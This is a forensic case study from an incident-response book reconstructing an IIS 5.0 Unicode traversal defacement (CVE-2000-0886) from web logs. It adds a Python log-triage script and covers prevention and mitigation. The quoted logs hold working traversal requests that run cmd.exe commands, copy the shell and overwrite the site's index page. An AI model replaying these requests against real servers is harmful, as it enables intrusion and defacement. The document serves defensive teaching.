The French Connection
by Bill Pennington, Guardent, Inc.
Copyright 2002 by The McGraw-Hill Companies, Inc.
Puzzled from what appeared to be a lack of evidence, the I.T. staff began to research Web defacement attacks and soon discovered that the Web server software they were using, Microsoft’s IIS Web server version 5.0, had a well-known bug that easily allowed attackers to take control of the machine. The bug the attacker exploited, the “Web server file request parsing vulnerability” (better known as the “Unicode Attack”), is detailed in the CVE database under #CVE-2000-0886.
This was an unsettling discovery for the I.T. staff; they realized that this server was on the inside of the network when it was compromised. Therefore, the attacker could now have backdoors to any number of systems inside the network, as well as copies of sensitive data and passwords.
Once the I.T. staff knew the probable method of entry, the well-known Unicode Web server bug, they began to piece together the attack. The bug relies on the ability to execute a system shell, a program called cmd.exe, in order to execute commands on the Web server. The I.T. staff found that if this bug was used, evidence of the attack would be in the Web server log files. They collected all of the log files from the Web server and imported them into a database for analysis. As cmd.exe is not a normally occurring string in Web server log files, they performed a search for that string and found the following:
03/03/2001 4:01 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+c: 200 730 484 31 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)
This was the first probe. If successful, the attacker would get a directory listing of the victim computer’s C drive. This is a common, non-invasive technique employed by automated scanning programs to test whether a computer is vulnerable to this bug, without causing any damage.
The next entry was another probe, looking at the directory listing of the D drive, if it existed:
03/03/2001 4:01 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+d: 200 747 484 31 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)
The following 13 log file entries show the attacker retrieving various directory listings in order to get the lay of the land, so he could become familiar with the environment. This involved retrieving more directory listings, as well as viewing the victim’s home page.
03/03/2001 4:02 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+e: 502 381 484 47 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)
03/03/2001 4:02 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+c: 200 730 484 31 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)
Hacker’s Challenge: Test Your Incident Response Skills Using 20 Scenarios
03/03/2001 4:02 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+c:\asfroot 200 666 492 47 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)
03/03/2001 4:02 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+c:\inetpub 200 749 492 32 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)
03/03/2001 4:02 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+c:\inetpub\wwwroot 200 1124 499 47 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)
03/03/2001 4:02 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /‘mmc.gif - 404 3387 440 0 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)
03/03/2001 4:02 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /mmc.gif - 404 3387 439 0 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)
03/03/2001 4:02 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+d: 200 747 484 16 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)
03/03/2001 4:03 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+d:\wwwroot.com 200 229 496 32 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)
03/03/2001 4:03 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+d:\wwwroot 200 4113 492 47 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)
03/03/2001 4:03 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /buzzxyz.html - 200 228 444 16 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)
03/03/2001 4:03 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /xyzBuzz3.swf - 200 245 324 5141 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)
03/03/2001 4:03 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /index.html - 200 228 484 0 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98) http://www.victim.com/buzzxyz.html
Once the attacker had a better understanding of the environment, the attack began. First, he renamed an auxiliary Web page to test his capabilities:
03/03/2001 4:05 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /scripts/../../winnt/system32/cmd.exe /c+rename+d:\wwwroot\detour.html+detour.html.old 502 355 522 31 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)
Next, he created a directory, c:\ArA, to set up shop; copied cmd.exe to his work area; and renamed it cmd1.exe:
03/03/2001 4:05 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /scripts/../../winnt/system32/cmd.exe /c+md+c:\ArA 502 355 488 31 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)
03/03/2001 4:05 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+c:\winnt\system32\cmd.Exe+c:\ArA\cmd1.exe 502 382 524 125 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)
The preceding is the last entry for the cmd.exe search. It becomes clear that the attacker was then using cmd1.exe to do his dirty work. A search for cmd1.exe turned up the entries that follow.
In the first entry for the cmd1.exe search, the attacker built the Web page he wanted to use to replace the real Web page on the server:
03/03/2001 4:07 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /scripts/../../ArA/cmd1.exe /c+echo+"<title>SKI</title><center><H1><b><u>****</u>SCRIPT+KIDZ, INC<u>****</u></h1><br><h2>You,+my+friendz+,are+completely+owned.+I'm+here,+your+security+is+nowhere.<br>Someone+should+check+your+system+security+coz+you+sure+aren't.<br></h2>"+>+c:\ArA\default.htm 502 355 763 31 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)
The attacker made a backup of the original Web site:
03/03/2001 4:08 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /scripts/../../ArA/cmd1.exe /c+rename+d:\wwwroot\index.html+index.html.old 502 355 511 16 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)
Finally, the attacker copied the defaced Web site over the original Web site and viewed his handiwork:
03/03/2001 4:10 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /scripts/../../ArA/cmd1.exe /c+copy+c:\ArA\default.htm+d:\wwwroot\index.html 502 382 514 31 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)
03/03/2001 4:11 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /index.html - 200 276 414 15 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)
As you can see from the log files, the attack from start to finish took just ten minutes.
ANSWERS
1. The attacker used the “Web server file request parsing vulnerability,” as detailed in the CVE database under #CVE-2000-0886, to get into the Web server.
2. The attacker made a copy of cmd.exe and renamed it to cmd1.exe, which obfuscated the audit trail, forcing the forensic investigator to follow a new log pattern.
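The two answers above come down to how the log was searched. The following Python triage script is an added example, not the book's code: it contrasts the staff's literal search for the string cmd.exe with a search keyed on the shape of the request (a ".." traversal into an executable that is handed a "/c" command), which also catches the renamed cmd1.exe. The field order is an assumption inferred from the entries quoted in this chapter, and the sample lines are six of those entries re-joined onto one line each.

```python
"""IIS log triage for traversal-to-shell requests (added example, not the
book's code). Contrasts a literal "cmd.exe" search with a search on the
request shape, which also catches the renamed copy, cmd1.exe."""
import re
from collections import namedtuple
from typing import Optional

# Field order ASSUMED from the entries quoted in the chapter (W3C extended
# format); on a real log take it from the "#Fields:" header instead.
FIELDS = ["date", "time", "c_ip", "s_sitename", "s_computername", "s_ip",
          "s_port", "cs_method", "cs_uri_stem", "cs_uri_query", "sc_status",
          "sc_bytes", "cs_bytes", "time_taken", "cs_host", "cs_user_agent",
          "cs_referer"]

# Constructed sample: six of the chapter's entries, each re-joined onto one
# line, with the backslashes the scan dropped restored.
SAMPLE_LOG = r"""
03/03/2001 4:01 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+c: 200 730 484 31 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)
03/03/2001 4:03 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /buzzxyz.html - 200 228 444 16 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)
03/03/2001 4:05 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+c:\winnt\system32\cmd.Exe+c:\ArA\cmd1.exe 502 382 524 125 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)
03/03/2001 4:08 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /scripts/../../ArA/cmd1.exe /c+rename+d:\wwwroot\index.html+index.html.old 502 355 511 16 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)
03/03/2001 4:10 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /scripts/../../ArA/cmd1.exe /c+copy+c:\ArA\default.htm+d:\wwwroot\index.html 502 382 514 31 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)
03/03/2001 4:11 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /index.html - 200 276 414 15 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)
"""

# "/../" anywhere in the URI stem: the request escaped the virtual directory.
TRAVERSAL = re.compile(r"(^|/)\.\.(/|$)")
# Stem ends in an executable and the query is a cmd.exe-style "/c <command>":
# the shape of the attack, independent of what the binary is called.
EXECUTABLE = re.compile(r"\.exe$", re.IGNORECASE)

Hit = namedtuple("Hit", "time client status stem query reason")


def parse_line(line: str) -> Optional[dict]:
    """Split one log line into named fields; the referer may be absent."""
    parts = line.split()
    if len(parts) < len(FIELDS) - 1:
        return None
    if len(parts) == len(FIELDS) - 1:
        parts.append("-")
    return dict(zip(FIELDS, parts))


def naive_cmd_search(log: str) -> list[str]:
    """The staff's first pass: lines containing the literal string cmd.exe."""
    return [ln for ln in log.splitlines() if "cmd.exe" in ln.lower()]


def classify(rec: dict) -> Optional[str]:
    """Name the suspicious pattern in a parsed record, or None if clean."""
    stem, query = rec["cs_uri_stem"], rec["cs_uri_query"]
    traversal = bool(TRAVERSAL.search(stem))
    shell_like = bool(EXECUTABLE.search(stem)) and query.lower().startswith("/c")
    if traversal and shell_like:
        name = stem.rsplit("/", 1)[-1].lower()
        if name == "cmd.exe":
            return "traversal to cmd.exe"
        return f"traversal to renamed shell ({name})"
    if traversal:
        return "directory traversal"
    if shell_like:
        return "executable invoked with /c"
    return None


def find_shell_requests(log: str) -> list[Hit]:
    """Every request matching a pattern, whatever the executable's name."""
    hits = []
    for line in log.splitlines():
        rec = parse_line(line)
        reason = classify(rec) if rec else None
        if reason:
            hits.append(Hit(rec["time"], rec["c_ip"], rec["sc_status"],
                            rec["cs_uri_stem"], rec["cs_uri_query"], reason))
    return hits


if __name__ == "__main__":
    print(f"literal cmd.exe search: {len(naive_cmd_search(SAMPLE_LOG))} lines")
    for h in find_shell_requests(SAMPLE_LOG):
        print(f"{h.time} {h.client} {h.status} {h.reason}: {h.stem} {h.query}")
```

On the sample the literal search returns two lines while the pattern search returns four, the extra two being the cmd1.exe requests. Note that the rename and copy entries carry a 502 status even though, as the defacement shows, the commands ran, so a filter on successful status codes would have hidden them.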
PREVENTION
Prevention of this attack would have been simple if the software on the Web server was kept up to date. The patch for the vulnerability the attacker used was released five months prior to the penetration. The patch in this case was in the form of a hot-fix, and at the time of this writing had not been rolled into a full service pack. The administrators had installed all the service packs but had failed to install the additional hot-fixes.
Proper hardening of the Web server could also have prevented this attack. When executing this attack, the attacker is issuing commands as the IUSR_COMPUTERNAME account. This account has no special administrative privileges on the Web server other than the privileges given to EVERYONE. The EVERYONE group, by default, has permission to execute all of the commands located in the %winnt%/system32 directory. On most servers of this kind, administrators are the only users that need to execute these commands from the console. Removing the rights for the EVERYONE group to execute the commands in the %winnt%/system32 directory would have prevented this attack, and most other attacks in the same class.
MITIGATION
To mitigate the damage caused by the penetration, the company decided to completely rebuild the Web server from scratch using the latest software available. While not always necessary, a complete rebuild is the best way to regain strong confidence in a machine’s software after a penetration. For continued security and accountability, the maintenance of the machine was assigned to a single person. In order to gain peace of mind, the company also ordered a security audit from an outside firm to assess any possible deeper penetration of their internal infrastructure. No further damage was found. However, a few weeks later, the company would again find themselves in need of security assistance; that story is detailed in Challenge 2, “The Insider.”
ADDITIONAL RESOURCES
The Honeynet Project had a Scan of the Month for February 2001 that profiled a very similar attack:
http://project.honeynet.org/scans/scan12/
Microsoft’s security bulletin for the vulnerability, including patch information:
http://www.microsoft.com/technet/security/bulletin/ms00-086.asp
The CVE entry:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0886